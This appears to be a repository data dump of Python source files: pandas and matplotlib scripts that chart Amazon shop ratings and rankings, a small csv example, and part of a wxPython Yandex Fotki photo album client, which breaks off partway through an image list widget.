"length_bytes": 5874,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 155,
"path": "/images.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport random\n\n\nfont = FontProperties(fname=\"/home/zhengquantao/python/DataDisplay/font/FangSong.ttf\")\n\nappear_day = 3\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n datetime_list = list()\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n datetime_list.append(filename[0][5:])\n break\n result = pd.concat(frame)\n sort_result = result.sort_values(by=['ASIN', 'date'])\n group_data = sort_result.groupby(['ASIN']) # .apply(lambda x: x.sort_values(\"date\", ascending=True))\n\n group_count = group_data['ASIN'].size().to_dict() # 转化成字典\n group_rank = sorted(group_count, key=lambda x: group_count[x], reverse=True) # 字典排序\n\n names = name.split(\".\")[0]\n\n # ===============评分===========\n fig = plt.figure(figsize=(14, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n create_file(\"image/\"+names)\n shop_score = good[1]['评分'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, shop_score, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.015, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 评分\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'评分.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================评论==========\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n shop_comment = good[1]['评论数'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, shop_comment, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.04, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 评论数\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'评论数.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================大类排名=================\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n shop_big_ranking = good[1]['大类排名'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, -shop_big_ranking, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.03, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 大类排名\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'大类排名.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================小类排名=================\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n shop_small_ranking = good[1]['小类排名'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, -shop_small_ranking, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.04, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 小类排名\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'小类排名.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\n# find_file(\"shop\")\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
{
"alpha_fraction": 0.5469574332237244,
"alphanum_fraction": 0.5603235960006714,
"avg_line_length": 34.11111068725586,
"blob_id": "1c9295868ba9efde8042ff14bc91bb9f53a109ed",
"content_id": "b8aba1ecae5c433ad0f5495c6a7a8196e594d58d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3049,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 81,
"path": "/tumao_data_display/save_xlsx.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport random\nimport numpy as np\nimport datetime\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n # datetime_list = list()\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n # data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n # datetime_list.append(filename[0][5:])\n break\n result = pd.concat(frame)\n sort_result = result.sort_values(by=['ASIN'])\n group_data = sort_result.groupby(['ASIN']) # .apply(lambda x: x.sort_values(\"date\", ascending=True))\n\n group_count = group_data['ASIN'].size().to_dict() # 转化成字典\n # group_rank = sorted(group_count, key=lambda x: group_count[x], reverse=True) # 字典排序\n\n # names = name.split(\".\")[0]\n today = str(datetime.date.today())\n create_file(\"week/\"+today)\n\n shop_array = list()\n\n for good in group_data:\n asin_id = good[0]\n asin_count = len(good[1])\n asin_score = round(sum(good[1]['评分'].fillna(0)) / asin_count, 2)\n asin_comment = round(sum(good[1]['评论数'].fillna(0)) / asin_count, 2)\n asin_small_ranking = round(sum(good[1]['小类排名'].fillna(0))/asin_count, 2)\n asin_big_ranking = round(sum(good[1]['大类排名'].fillna(0))/asin_count, 2)\n shop_array.append([asin_id, asin_score, asin_comment, asin_big_ranking, asin_small_ranking])\n data_obj = pd.DataFrame(shop_array, columns=['ASIN', '评分', '评论数', '大类排名', '小类排名'])\n writer = pd.ExcelWriter(\"week/\"+today+\"/\"+name)\n data_obj.to_excel(writer, \"Sheet\", index=False)\n writer.save()\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop/2\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
{
"alpha_fraction": 0.5478723645210266,
"alphanum_fraction": 0.5797872543334961,
"avg_line_length": 14.75,
"blob_id": "ba6876d8dffb687f7823b544c9aa134badc2aa4b",
"content_id": "fcebfb9db7c5d8ea0178990ea08e339da9832262",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 12,
"path": "/test3.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "from functools import reduce\nimport datetime\nprint(datetime.date.today())\n\na = {'a': 1, 'b': 2, 'n': 0, 'c': 3, 'f': 5}\n\n\ndef mul(x):\n return a[x] < 3\n\nm = filter(mul, a)\nprint(list(m))"
},
{
"alpha_fraction": 0.544477641582489,
"alphanum_fraction": 0.5665671825408936,
"avg_line_length": 25.55555534362793,
"blob_id": "b5c1f54cbc65c9dc7b2d66975f04feab87b57c08",
"content_id": "0b54b07a9104aba2499c4666df85b0edf3dee935",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 63,
"path": "/show.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n# from matplotlib.widgets import MultiCursor\nimport matplotlib.dates as mdate\nimport pandas as pd\n\n\nclass ShowData(object):\n\n def __init__(self):\n self.path = None\n pass\n\n def open(self, path):\n get_data = pd.read_excel(path)\n return get_data\n\n def plot(self, path):\n data = self.open(path)\n shop_name = data['ASIN']\n shop_score = data['评分'].fillna('0')\n shop_comment = data['评论数'].fillna('0')\n shop_big_ranking = data['大类排名'].fillna('0')\n shop_small_ranking = data['小类排名'].fillna('0')\n\n fig = plt.figure(figsize=(10, 6))\n (ax1, ax2, ax3, ax4) = fig.subplots(nrows=4)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n ax1.plot(shop_score.index, shop_score, \"red\", label=\"评分\")\n ax1.legend(title=\"评分\")\n ax1.grid(True)\n\n ax2.plot(shop_comment.index, shop_comment, \"red\", label=\"评论数\")\n ax2.legend(title=\"评论数\")\n ax2.grid(True)\n\n ax3.plot(shop_big_ranking.index, shop_big_ranking, \"red\", label=\"大类\")\n ax3.grid(True)\n ax3.legend(title=\"大类\")\n\n ax4.plot(shop_small_ranking.index, shop_small_ranking, \"red\", label=\"小类\")\n ax4.grid(True)\n ax4.legend(title=\"小类\")\n\n # multi = MultiCursor(fig.canvas, (ax1, ax2, ax3, ax4), color='r', lw=1, linestyle=':',\n # horizOn=False, vertOn=True)\n\n plt.xlabel(\"店名\")\n plt.savefig('/')\n plt.show()\n\n\ns = ShowData()\ns.plot(\"./shop/2019-12-05/DJ(FR).xlsx\")\n\n\nclass ReadFile(object):\n def __init__(self):\n pass\n\n def __new__(cls, *args, **kwargs):\n pass\n\n\n"
}
] | 7 |
juanmafx/m15 | https://github.com/juanmafx/m15 | da8b3e2fe85514de01e66d8c3b987cfadef05ec4 | 14126480c24fa987e859231c2ae3492f2b5b0835 | d02ef9247d2da04ed73958f3d6ba6198cb4ee37c | refs/heads/master | 2020-03-11T00:42:34.587616 | 2018-04-26T21:24:21 | 2018-04-26T21:24:21 | 129,670,177 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5563910007476807,
"alphanum_fraction": 0.5964912176132202,
"avg_line_length": 27.428571701049805,
"blob_id": "c566c06351377c909bec8919bfd605a20d971197",
"content_id": "6ab599e9d1c2a1b760c80e94e16993abe3240174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 14,
"path": "/m15.py",
"repo_name": "juanmafx/m15",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 15 22:57:47 2018\n\n@author: J\n\"\"\"\nimport csv\nwith open('Bitcoin15.csv', 'wb') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\nprint (\"Corio\")\n\n"
}
] | 1 |
anwinged/phoebe | https://github.com/anwinged/phoebe | c796908e911f442ffd115a3074efd84ccd12b916 | d8f706a91f827845bc919835c7ce616cb9524e96 | 893b0aec18f05d699bc9231b5dda6a59fbfa4e09 | refs/heads/master | 2016-08-07T14:36:09.769870 | 2015-06-13T18:09:24 | 2015-06-13T18:09:24 | 32,375,597 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5719599723815918,
"alphanum_fraction": 0.5755515694618225,
"avg_line_length": 33.27601623535156,
"blob_id": "f5f5821dcdd78fc081d0174a4755506f78800b74",
"content_id": "46e87c1521c8fa8b0fd0866433d19e4b8a3339a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8018,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 221,
"path": "/lib/controllers/overviewctr.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport wx\r\nfrom lib.models import album\r\nfrom lib.models import yafotki\r\nfrom lib.models import cachedb\r\nfrom lib.controllers import progressctr\r\nfrom lib.extra import utils\r\nfrom lib.forms import overviewfrm\r\nfrom lib.forms import authfrm\r\nfrom lib.forms import syncfrm\r\nfrom lib.forms import singleviewfrm\r\n\r\n\r\nPROGRAM_NAME = u'Phoebe'\r\nSETTINGS_FILE = u'settings.json'\r\n\r\nDEFAULT_USER_SETTINGS = {\r\n 'pagewidth': 804,\r\n 'imageborder': 2,\r\n 'group_temp': '<center>{{rows}}</center>\\n',\r\n 'row_temp': '<a href=\"{{1200:href}}\"><img src=\"{{*:href}}\" width=\"{{*:w}}\" height=\"{{*:h}}\"/></a>',\r\n 'href_temp': '{{1000:href}}.jpg\\n',\r\n 'albums': {},\r\n}\r\n\r\n\r\nclass OverviewController(object):\r\n def __init__(self, app):\r\n self.app = app # экземпляр приложения\r\n \"\"\"@type : wx.App\"\"\"\r\n self.form = None # форма представления данных\r\n \"\"\"@type : wx.OverviewForm\"\"\"\r\n self.app_settings = {} # настройки приложения\r\n \"\"\"@type : dict\"\"\"\r\n self.user_name = u'' # имя текущего пользователя\r\n \"\"\"@type : unicode\"\"\"\r\n self.user_settings = {} # настройки пользователя\r\n \"\"\"@type : dict\"\"\"\r\n self.service_album = None # сервисный альбом\r\n \"\"\"@type : album.ServiceAlbum\"\"\"\r\n\r\n self.init()\r\n\r\n def album_settings(self, alb):\r\n syncfrm.SyncSettingsDialog(alb, self.form).Run()\r\n self.save_album_settings(alb)\r\n self.form.UpdateAlbumView(alb)\r\n\r\n def copy_photos(self, imglist, cols=1):\r\n \"\"\"\r\n Place photos\r\n @type imglist: list of photo.MatchedPhoto\r\n \"\"\"\r\n stripeWidth = self.user_settings['pagewidth']\r\n stripeBorder = self.user_settings['imageborder']\r\n stripeHeight = stripeWidth - 2 * stripeBorder\r\n group_temp = self.user_settings['group_temp']\r\n row_temp = self.user_settings['row_temp']\r\n rows = len(imglist) / cols + bool(len(imglist) % cols)\r\n text = ''\r\n\r\n for i in xrange(rows):\r\n row = imglist[i * cols : (i + 1) * cols]\r\n dims = utils.calc_frames([img.ratio for img in row],\r\n stripeWidth, stripeBorder, stripeHeight)\r\n rows_text = ''.join([utils.render_template(row_temp, img.remote, w, h)\r\n for img, (w, h) in zip(row, dims) if img.is_remote()])\r\n text += group_temp.replace('{{rows}}', rows_text)\r\n\r\n if utils.text_to_clipboard(text):\r\n self.show_log(u'Скопировано: {}'.format(len(imglist)))\r\n else:\r\n self.show_log(u'Чо та ни фига не могу скопировать')\r\n\r\n def copy_photo_links(self, imglist):\r\n \"\"\"\r\n @type imglist: list of photo.MatchedPhoto\r\n \"\"\"\r\n link_temp = self.user_settings['href_temp']\r\n text = ''.join([utils.render_template(link_temp, img.remote, 1024, 1024)\r\n for img in imglist if img.is_remote()])\r\n if utils.text_to_clipboard(text):\r\n self.show_log(u'Скопировано: {}'.format(len(imglist)))\r\n else:\r\n self.show_log(u'Чо та ни фига не могу скопировать')\r\n\r\n def create_form(self):\r\n self.form = overviewfrm.OverviewForm(self, PROGRAM_NAME)\r\n self.app.SetTopWindow(self.form)\r\n self.form.Show()\r\n\r\n @utils.http_handler\r\n def delete_album(self, alb):\r\n progress = progressctr.Progress(parent=self.form)\r\n with progress:\r\n alb.delete(progress)\r\n self.load_album(alb, progress)\r\n self.form.UpdateAlbumView(alb)\r\n\r\n def exit(self):\r\n self.save_user_settings()\r\n self.save_app_settings()\r\n\r\n def get_user_db_path(self):\r\n return os.path.join('usr', self.user_name + '.db')\r\n\r\n def get_user_settings_path(self):\r\n return os.path.join('usr', self.user_name + '.json')\r\n\r\n def init(self):\r\n self.load_app_settings()\r\n self.create_form()\r\n lastuser = self.app_settings.get('lastuser')\r\n if lastuser:\r\n self.load_user(lastuser)\r\n else:\r\n self.show_name(u'Залогинься!')\r\n\r\n @utils.http_handler\r\n def load_album(self, alb, progress=None):\r\n progress = progressctr.Progress.cover(progress, parent=self.form)\r\n with progress:\r\n photos = alb.get_photos(progress)\r\n self.form.ShowPhotos(photos, progress)\r\n self.show_title(alb)\r\n self.show_info(u'Всего: {}'.format(len(photos)))\r\n self.form.SetCurrentAlbum(alb)\r\n\r\n def load_app_settings(self):\r\n self.app_settings = utils.load_file(SETTINGS_FILE, {})\r\n\r\n @utils.long_time\r\n @utils.http_handler\r\n def load_user(self, username, password=None):\r\n self.form.ClearAll()\r\n self.user_name = username\r\n self.user_settings = utils.load_file(self.get_user_settings_path(), DEFAULT_USER_SETTINGS)\r\n self.user_settings['name'] = self.user_name\r\n self.app_settings['lastuser'] = self.user_name\r\n cachedb.connect(self.get_user_db_path())\r\n auth_token = self.user_settings.get('token')\r\n if auth_token or password:\r\n if password:\r\n yandex_service = yafotki.YandexService(self.user_name, password)\r\n else:\r\n yandex_service = yafotki.YandexService(self.user_name, password, auth_token)\r\n yandex_service.load()\r\n self.show_name(self.user_name)\r\n self.load_albums(yandex_service)\r\n else:\r\n self.show_name(u'Залогинься!')\r\n\r\n @utils.http_handler\r\n def load_albums(self, yaservice):\r\n yaservice.load()\r\n album_settings = self.user_settings['albums']\r\n self.user_settings['token'] = yaservice.token\r\n self.service_album = album.ServiceAlbum(yaservice, album_settings)\r\n self.form.ShowAlbumTree(self.service_album)\r\n\r\n def login(self):\r\n dlg = authfrm.AuthDialog(self.form, self.user_name or '', '')\r\n if dlg.ShowModal() == wx.ID_OK:\r\n self.load_user(dlg.username, dlg.password)\r\n\r\n def open_photo(self, photos, index=0):\r\n if not photos or index is None:\r\n return\r\n frm = singleviewfrm.SingleviewForm(self.form, photos, index)\r\n frm.ShowModal()\r\n\r\n @utils.long_time\r\n def refresh_albums(self):\r\n self.form.ClearAll()\r\n yaservice = self.service_album.service\r\n self.load_albums(yaservice)\r\n self.form.ReselectAlbum()\r\n\r\n def save_album_settings(self, alb):\r\n self.user_settings['albums'].update({\r\n alb.id: alb.get_settings()\r\n })\r\n self.save_user_settings()\r\n\r\n def save_app_settings(self):\r\n utils.save_file(SETTINGS_FILE, self.app_settings)\r\n\r\n def save_user_settings(self):\r\n if self.user_name:\r\n utils.save_file(self.get_user_settings_path(), self.user_settings)\r\n cachedb.close()\r\n\r\n def show_info(self, text):\r\n self.form.SetStatusText(text, 1)\r\n\r\n def show_log(self, text):\r\n self.form.SetStatusText(text, 2)\r\n\r\n def show_name(self, text):\r\n self.form.SetStatusText(text, 0)\r\n\r\n def show_title(self, alb=None):\r\n title = PROGRAM_NAME\r\n if alb:\r\n title += u': ' + alb.title\r\n if isinstance(alb, album.PhotoAlbum) and alb.folder:\r\n title += u' - ' + alb.folder\r\n self.form.SetTitle(title)\r\n\r\n @utils.http_handler\r\n def upload_album(self, alb):\r\n progress = progressctr.Progress(parent=self.form)\r\n with progress:\r\n alb.synchronize(progress)\r\n self.load_album(alb, progress)\r\n self.form.UpdateAlbumView(alb)\r\n"
},
{
"alpha_fraction": 0.5611474514007568,
"alphanum_fraction": 0.5732259750366211,
"avg_line_length": 32.25862121582031,
"blob_id": "803dd5f0e4fb6fe3c3623ccf81a42eb734cde8af",
"content_id": "32e06f3aec51a44db241b2690e47aa8efc894085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 58,
"path": "/lib/forms/singleviewfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\nfrom lib.extra import utils\r\n\r\nclass SingleviewForm(wx.Dialog):\r\n def __init__(self, parent, photos, index):\r\n wx.Dialog.__init__(self, parent, title=u'Просмотр фотографии')\r\n\r\n self.photos = photos\r\n self.index = index\r\n\r\n self.image = wx.StaticBitmap(self)\r\n\r\n self.box = wx.BoxSizer(wx.VERTICAL)\r\n # adding stretchable space before and after centers the image.\r\n self.box.AddStretchSpacer(1)\r\n self.box.Add(self.image, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 0)\r\n self.box.AddStretchSpacer(1)\r\n\r\n self.image.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)\r\n\r\n self.SetWindowStyle(0)\r\n self.SetBackgroundColour(wx.Colour(25, 25, 25))\r\n self.Maximize()\r\n self.SetSizerAndFit(self.box)\r\n self.Center(wx.CENTER_ON_SCREEN)\r\n self.ShowPhoto()\r\n\r\n def OnKeyDown(self, event):\r\n if event.GetKeyCode() == wx.WXK_ESCAPE:\r\n self.EndModal(wx.ID_OK)\r\n if event.GetKeyCode() == wx.WXK_RIGHT:\r\n self.index = (self.index + 1) % len(self.photos)\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_LEFT:\r\n self.index = (self.index - 1) % len(self.photos)\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_HOME:\r\n self.index = 0\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_END:\r\n self.index = len(self.photos) - 1\r\n self.ShowPhoto()\r\n\r\n @utils.long_time\r\n def ShowPhoto(self):\r\n photo = self.photos[self.index]\r\n w, h = wx.GetDisplaySize()\r\n img = photo.wximage(max(w, 1200), max(h, 1200))\r\n img = utils.resize(img, w, h, wx.IMAGE_QUALITY_BICUBIC)\r\n self.image.SetBitmap(wx.BitmapFromImage(img))\r\n self.SetTitle(u'{} {}x{}'.format(photo.title, img.GetWidth(), img.GetHeight()))\r\n self.image.Center()\r\n self.Refresh()\r\n"
},
{
"alpha_fraction": 0.5387566089630127,
"alphanum_fraction": 0.5421724915504456,
"avg_line_length": 30.92560577392578,
"blob_id": "96bef79ba8b36cee435250627ca1c30f26e06962",
"content_id": "76f7d2fd62fe0038839b7e7d7ff1ef8b419bc0ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22357,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 578,
"path": "/lib/widgets/imglistctrl.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\nfrom lib.extra import utils\r\n\r\n\r\nclass BaseImage:\r\n \"\"\"\r\n Дескриптор изображения. Содержит всю информацию об изображении,\r\n осуществляет кеширование и загрузку картинки.\r\n \"\"\"\r\n def __init__(self, owner, data=None):\r\n \"\"\"\r\n @type owner: ImageListCtrl\r\n @param owner: компонент-владелец картинки\r\n \"\"\"\r\n self.owner = owner\r\n self.__data = data\r\n self.__cache_size = (-1, -1)\r\n self.__cache_img = None\r\n\r\n def GetData(self):\r\n \"\"\"\r\n @return: Получить пользовательские данные компонента\r\n \"\"\"\r\n return self.__data\r\n\r\n def SetData(self, new_data):\r\n \"\"\"\r\n Установить пользовательские данные компонента\r\n \"\"\"\r\n self.__data = new_data\r\n\r\n @property\r\n def data(self):\r\n return self.__data\r\n\r\n def LoadImage(self, w, h):\r\n \"\"\"\r\n Загрузить изображение.\r\n Дополнительные параметры ширины и высоты можно использовать при загрузке\r\n изображения, однако следует учесть, что изменение размера происходит в методе Load.\r\n Этот метод нужно переопределять в классах-наследниках.\r\n @param w: ширина миниатюры\r\n @param h: высота миниатюры\r\n @rtype: wx.Image\r\n @return: загруженное изображение\r\n \"\"\"\r\n return wx.EmptyImage(w, h, True)\r\n\r\n def Load(self):\r\n \"\"\"\r\n Загрузить изображение и изменить его размер до размера миниатюры.\r\n Для отображения миниатюры, нужно сперва явно вызвать этот метод,\r\n чтобы картинка загрузилась и сохранилась в кеше.\r\n \"\"\"\r\n x, y, w, h = self.GetImageRect(self.owner.GetImageWidth(), self.owner.GetImageHeight())\r\n img = self.LoadImage(w, h)\r\n ww = img.GetWidth()\r\n hh = img.GetHeight()\r\n # проверить, если нужно изменить размер\r\n if ww != w or hh != h:\r\n img = utils.resize(img, w, h)\r\n self.__cache_size = (w, h)\r\n self.__cache_img = img\r\n\r\n def GetWxImage(self, w, h):\r\n \"\"\"\r\n Поучить миниатюру\r\n Используется внутри ImageListCtrl для получения именно того изображения, которое будет отрисовано\r\n @param w: ширина миниатюры\r\n @param h: высота миниатюры\r\n @rtype: wx.Image\r\n @return: возвращает wx.Image такого размера, что он вписывается в заданный прямоугольник W x H\r\n \"\"\"\r\n if self.__cache_size != (w, h):\r\n return wx.EmptyImage(w, h, True)\r\n return self.__cache_img\r\n\r\n def GetFrameRect(self, width, height):\r\n d = 8\r\n return d, d, width - d * 2, height - d * 2\r\n\r\n def GetImageRect(self, width, height):\r\n d = 16\r\n return d, d, width - d * 2, height - d * 2\r\n\r\n def Draw(self, canvas, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать миниатюру (границу и изображение)\r\n @param index: номер миниатюры\r\n @param canvas: объект, на котором будет рисование\r\n @param width: ширина области рисования (с границами)\r\n @param height: высота области рисования (с границами)\r\n \"\"\"\r\n dc = wx.MemoryDC()\r\n dc.SelectObject(canvas)\r\n dc.BeginDrawing()\r\n self.DrawBackground(dc, width, height, index, selected)\r\n self.DrawInframeBackground(dc, width, height, index, selected)\r\n self.DrawFrame(dc, width, height, index, selected)\r\n self.DrawImage(dc, width, height, index, selected)\r\n self.DrawBadges(dc, width, height, index, selected)\r\n # dc.SetPen(wx.Pen(wx.RED, 1, wx.SOLID))\r\n # dc.DrawRectangle(0, 0, w, h)\r\n dc.EndDrawing()\r\n\r\n def DrawBackground(self, dc, width, height, index, selected):\r\n dc.SetPen(wx.Pen(wx.BLACK, 0, wx.TRANSPARENT))\r\n dc.SetBrush(wx.Brush(self.owner.GetBackgroundColour(), wx.SOLID))\r\n dc.DrawRectangle(0, 0, width, height)\r\n\r\n def DrawInframeBackground(self, dc, width, height, index, selected):\r\n pass\r\n # dc.SetBrush(wx.RED_BRUSH)\r\n # dc.DrawRectangleRect(wx.Rect(*self.GetFrameRect(width, height)))\r\n\r\n def DrawFrame(self, dc, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать рамку вокруг миниатюры\r\n \"\"\"\r\n if selected:\r\n color = self.owner.GetSelectionColour()\r\n thickness = 2\r\n else:\r\n color = self.owner.GetFrameColour()\r\n thickness = 1\r\n dc.SetPen(wx.Pen(color, thickness, wx.SOLID))\r\n dc.SetBrush(wx.Brush(wx.BLACK, wx.TRANSPARENT))\r\n dc.DrawRectangleRect(wx.Rect(*self.GetFrameRect(width, height)))\r\n\r\n def DrawImage(self, dc, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать изображение миниатюры\r\n @param index: номер миниатюры\r\n @param img: миниатюра\r\n @param dc: объект, на котором будет рисование\r\n @param w: ширина области рисования (с границами)\r\n @param h: высота области рисования (с границами)\r\n \"\"\"\r\n ix, iy, iw, ih = self.GetImageRect(width, height)\r\n img = self.GetWxImage(iw, ih)\r\n bmp = wx.BitmapFromImage(img)\r\n dc.DrawBitmap(bmp, width / 2 - img.GetWidth() / 2, height / 2 - img.GetHeight() / 2)\r\n\r\n def DrawBadges(self, dc, width, height, index, selected):\r\n pass\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nclass LocalImage(BaseImage):\r\n \"\"\"\r\n Локальное изображение\r\n - изображение, которое находится на локальном компьютере или к которому\r\n есть доступ по стандартному пути\r\n \"\"\"\r\n def __init__(self, owner, img_path):\r\n 